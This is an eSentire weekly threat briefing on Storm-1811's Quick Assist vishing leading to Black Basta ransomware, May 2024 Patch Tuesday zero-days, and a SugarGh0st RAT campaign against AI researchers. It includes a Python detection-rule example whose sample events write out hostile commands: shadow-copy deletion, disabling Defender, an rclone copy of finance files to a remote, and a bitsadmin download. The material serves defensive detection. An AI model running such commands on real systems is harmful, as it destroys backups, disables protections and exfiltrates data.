TLP: CLEAR - This information may be shared publicly
eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Bottom Line: The misuse of remote assistance tools in social engineering attacks, exemplified by the recent exploitation of Microsoft's Quick Assist by Storm-1811 to deliver ransomware, highlights the persistent and evolving nature of cybersecurity threats. Organizations must remain vigilant and implement proactive measures to mitigate the risks associated with such attacks.
On May 15th, Microsoft Threat Intelligence released a report on the cybercriminal group Storm-1811 abusing the client management tool Quick Assist to target users in social engineering attacks leading to ransomware deployment. Quick Assist is a remote assistance tool developed by Microsoft, intended to facilitate technical support and troubleshooting between users.
Attacks typically begin with vishing (voice phishing), where threat actors impersonate IT support staff to trick users into granting remote access via Quick Assist. This initial breach of trust is often facilitated by exploiting common fears or concerns, such as purported security threats or system vulnerabilities. Once access is obtained, the attackers deploy various malicious tools and malware, including ScreenConnect, Qakbot, and Cobalt Strike. ScreenConnect, a remote desktop tool, allows attackers to maintain persistent access and manipulate the victim's system. Qakbot, a notorious banking trojan, is used to steal sensitive financial information and login credentials, providing the attackers with valuable data that can be monetized or used in future attacks. Cobalt Strike, a sophisticated penetration testing tool repurposed for malicious activities, facilitates lateral movement within the network, allowing the attackers to identify and compromise additional systems.
The ultimate goal of these intrusions is the deployment of Black Basta ransomware. Black Basta is an infamous form of ransomware, encrypting files and rendering systems inoperable to extort victims for a ransom payment in exchange for the decryption key.
On May 10th, the Cybersecurity and Infrastructure Security Agency (CISA), along with the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), released a joint Cybersecurity Advisory (CSA) on Black Basta ransomware as part of the ongoing “#StopRansomware” effort, aimed at informing network defenders. The report details the sophisticated tactics and tools used by the Black Basta ransomware group. They typically gain initial access through phishing emails or by exploiting public-facing applications. Once inside, they utilize network scanners and PowerShell scripts to disable antivirus software and other defenses. For lateral movement, they employ tools such as BITSAdmin, PsExec, and remote desktop protocols, alongside Cobalt Strike beacons. They escalate privileges using Mimikatz and by exploiting known vulnerabilities such as ZeroLogon and PrintNightmare. They exfiltrate data with RClone, encrypt files using the ChaCha20 algorithm, and delete shadow copies with vssadmin.exe.
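As an added example that is not part of this briefing or the CSA, the following toy Python pass shows how several of the Black Basta behaviours listed above (vssadmin shadow-copy deletion, PowerShell tampering with Defender, BITSAdmin downloads, PsExec lateral movement, RClone exfiltration) can be turned into simple process-creation rules and correlated per host; the rule patterns, event shape and sample events are constructed assumptions, not eSentire's detection content.

```python
"""Toy process-creation rule pass for Black Basta TTPs (added example,
constructed rules and events; not eSentire's or CISA's detection content)."""
import re

# Each rule: (name, image-name prefix, command-line regex). The image name is
# compared case-insensitively after the directory has been stripped.
RULES = [
    ("shadow_copy_deletion", "vssadmin", r"delete\s+shadows"),
    ("defender_tamper", "powershell", r"Set-MpPreference.*-Disable\w+"),
    ("bitsadmin_download", "bitsadmin", r"/transfer"),
    ("psexec_lateral", "psexec", r"\\\\\w+"),          # \\HOST target argument
    ("rclone_exfil", "rclone", r"\b(copy|sync|move)\b"),
]

def match_event(event):
    """Return the names of every rule an event matches (empty when benign)."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    return [name for name, prefix, pattern in RULES
            if image.startswith(prefix) and re.search(pattern, event["cmdline"], re.I)]

def triage(events):
    """Map each host with at least one hit to its sorted, de-duplicated rule names."""
    hits = {}
    for ev in events:
        for name in match_event(ev):
            hits.setdefault(ev["host"], set()).add(name)
    return {host: sorted(names) for host, names in hits.items()}

def escalate(events, min_rules=2):
    """Hosts where several distinct TTPs fired; a single hit is often admin noise."""
    return sorted(h for h, names in triage(events).items() if len(names) >= min_rules)

# Constructed sample events in a Sysmon-like shape (host, image, cmdline).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "WS01", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Finance remote:loot --transfers 8"},
    {"host": "WS02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download http://example.invalid/x.dat C:\ProgramData\x.dat"},
    {"host": "WS02", "image": r"C:\Temp\PsExec.exe",
     "cmdline": r"PsExec.exe \\FS01 -s cmd.exe /c whoami"},
    {"host": "WS03", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},   # routine admin use, no rule fires
]
```

Running triage over real telemetry needs the vendor's field names mapped onto host, image and cmdline; the correlation threshold is what keeps legitimate one-off admin commands out of the escalation list.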
eSentire has detections in place to identify malicious use of ScreenConnect, as well as QakBot, Cobalt Strike, and Black Basta. Additionally, the eSentire Threat Intelligence team is performing threat hunts based on known Indicators of Compromise (IoCs) related to this campaign. eSentire has observed activity that matches the information provided by Microsoft. In the case observed by eSentire, activity was disrupted prior to the attempted deployment of Black Basta. Previously, in the October 2023 TRU Intelligence Briefing, eSentire discussed the increased use of Remote Monitoring and Management (RMM) tools by multiple ransomware groups.
The misuse of Quick Assist by Storm-1811 highlights the increasing sophistication of social engineering attacks. This trend exemplifies the importance of robust cybersecurity awareness training for employees to recognize and resist phishing and vishing attempts. By understanding the tactics employed by threat actors and implementing appropriate defensive measures, businesses can better protect themselves against such attacks.
One of the key takeaways from these incidents is the critical role of cybersecurity awareness training. Educating employees about the various forms of social engineering attacks, such as vishing, and empowering them to report suspicious activities can significantly reduce the likelihood of successful breaches. Additionally, by abiding by the principle of least privilege, organizations can help limit the potential impact of a security breach. This can be accomplished by restricting access to sensitive systems and resources to only those individuals who require it for their job functions.
Microsoft's recommendation to disable or uninstall Quick Assist and other unused remote management tools serves as a practical defense strategy against social engineering attacks. By reducing the attack surface, organizations can limit the avenues through which malicious actors can exploit vulnerabilities and gain unauthorized access to systems. Disabling or removing unnecessary tools minimizes the potential points of entry for attackers, effectively closing off potential vectors for exploitation.
Bottom Line: May 14th marked Microsoft’s monthly Patch Tuesday release. This month, Microsoft highlighted two zero-day vulnerabilities, which are confirmed to be actively exploited by threat actors. Organizations are strongly recommended to review the full Microsoft release and apply all relevant security patches.
In Microsoft’s May Patch Tuesday release, the company addressed a total of 61 separate vulnerabilities; one vulnerability was publicly disclosed prior to the release of security patches, and two of the vulnerabilities are confirmed to have been exploited by threat actors. The actively exploited zero-day vulnerabilities are tracked as CVE-2024-30040 and CVE-2024-30051. CVE-2024-30040 (CVSS: 8.8) is a Windows MSHTML Platform Security Feature Bypass vulnerability. A threat actor that exploited this vulnerability by convincing a user to interact with a malicious file could achieve code execution. Microsoft has not shared details on real-world attacks involving exploitation of this vulnerability, but in an attack scenario it is most likely that threat actors would deliver the malicious file via email.
CVE-2024-30051 (CVSS: 7.8) is a Windows DWM Core Library Elevation of Privilege vulnerability. An attacker with previously established access to a vulnerable system could exploit CVE-2024-30051 to gain SYSTEM privileges. The vulnerability was discovered and reported to Microsoft by Kaspersky, which released a report on real-world exploitation. In mid-April 2024, Kaspersky observed CVE-2024-30051 being exploited in attacks involving QakBot and various other malware families. Kaspersky states that they “believe that multiple threat actors have access to it (the exploit)”.
While only two of the 61 vulnerabilities are confirmed to be exploited at this time, organizations are strongly recommended to review the full patch release and apply all relevant security patches. eSentire Managed Vulnerability Service (MVS) has plugins in place to identify vulnerable devices. Additionally, the eSentire product suite contains a variety of detections for QakBot activity.
As exploitation of multiple vulnerabilities has been confirmed, it is critical that organizations address the vulnerabilities outlined in Microsoft’s May Patch Tuesday release. It is strongly recommended to prioritize the patching of known exploited vulnerabilities and of vulnerabilities in Internet-facing applications. Internet-facing applications are more likely to be targeted by threat actors, especially if they contain vulnerabilities that enable remote and unauthenticated access.
It should be noted that Microsoft states three zero-day vulnerabilities were addressed in this patch release, but in the above details, eSentire Threat Intelligence only outlines two specific vulnerabilities. Microsoft has shifted their definition of zero-day vulnerabilities to mean “a flaw in software for which no official patch or security update has been released”. By this definition, any vulnerability that is public knowledge OR exploited by threat actors, and lacks a security patch, is a zero-day. Other major vendors, including eSentire, follow the classic definition of zero-day, which requires confirmed exploitation prior to patch release. The third vulnerability that Microsoft tracks as a zero-day, but which has not been exploited in the wild, is CVE-2024-30046 (CVSS: 5.9), a Denial of Service (DoS) vulnerability in Visual Studio.
Microsoft is not the only company to address actively exploited vulnerabilities this month. Over the past week, Google has disclosed three zero-day vulnerabilities that all impact Google Chrome. While Google has not shared any information on their use in attacks, all readers are urged to ensure that they are running the most recently available Chrome version (Chrome 125.0.6422.60 [Linux] 125.0.6422.60/.61 [Windows, Mac]). Chrome versions may be verified by navigating to Settings, followed by About Chrome. Updates in Chrome are applied automatically but require users to restart their browser.
The eSentire Threat Intelligence team continues to track notable vulnerabilities from this and other releases.
Bottom Line: Organizations and individuals involved in emerging technologies face elevated risks of cyber espionage, exemplified by a recent campaign targeting U.S.-based Artificial Intelligence experts to acquire a technical edge.
On May 16th, researchers from Proofpoint released a report on a cyber espionage campaign targeting American Artificial Intelligence (AI) experts. This campaign, attributed to the group UNK_SweetSpecter, utilized advanced tactics and a well-crafted delivery mechanism to compromise its high-value targets.
The SugarGh0st Remote Access Trojan (RAT), a customized variant of the notorious Gh0stRAT, was delivered through phishing emails containing AI-themed lures. These emails included a ZIP file attachment containing a Windows shortcut (LNK) file. This file, in turn, executed a JavaScript dropper which displayed a decoy document to distract the victim while silently installing the SugarGh0st RAT payload. Persistence was maintained by modifying a registry key, ensuring the malware remained active on the infected system. These methods allowed the malware to evade initial detection and establish a connection to the threat actor’s Command-and-Control (C2) infrastructure for continuous data exfiltration and remote control.
The highly targeted nature of this campaign is notable and implies significant reconnaissance and planning prior to engaging targets. UNK_SweetSpecter is not opportunistic and appears to have highly specific goals; the targeting of AI experts suggests an interest in acquiring sensitive AI research. Given the sophistication of the methods and the specific targeting, this campaign has the potential to be state sponsored. Proofpoint has not attributed UNK_SweetSpecter to any known group or state, but they do specifically mention the repeated identification of Chinese-language artifacts during investigations. It is possible that UNK_SweetSpecter is associated with the Chinese state; however, there is currently not enough evidence to make any formal attribution. Sophisticated state-sponsored APT groups are known to include details in their malware that would lead to misattribution; this tactic is known as a False Flag, and often relies on including language from a foreign state.
AI-related organizations and researchers are a valuable target for both financially motivated threat actors and state-sponsored APTs. Attackers may steal information for espionage purposes, to sell on dark web markets, or to enable future attacks. Additionally, threat actors may poison AI training models, deploy encryption/destructive malware, or perform a variety of other malicious actions. Organizations developing or performing research into emerging technologies need to adjust their threat model to include advanced threat actors and the risk of campaigns that specifically target these technologies. Defense strategies should include rigorous phishing awareness training, regular security audits, and multi-layered defenses such as advanced email filtering and endpoint detection.
The eSentire Threat Intelligence team is tracking this campaign and performing Threat Hunts based on shared Indicators of Compromise (IoCs).
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.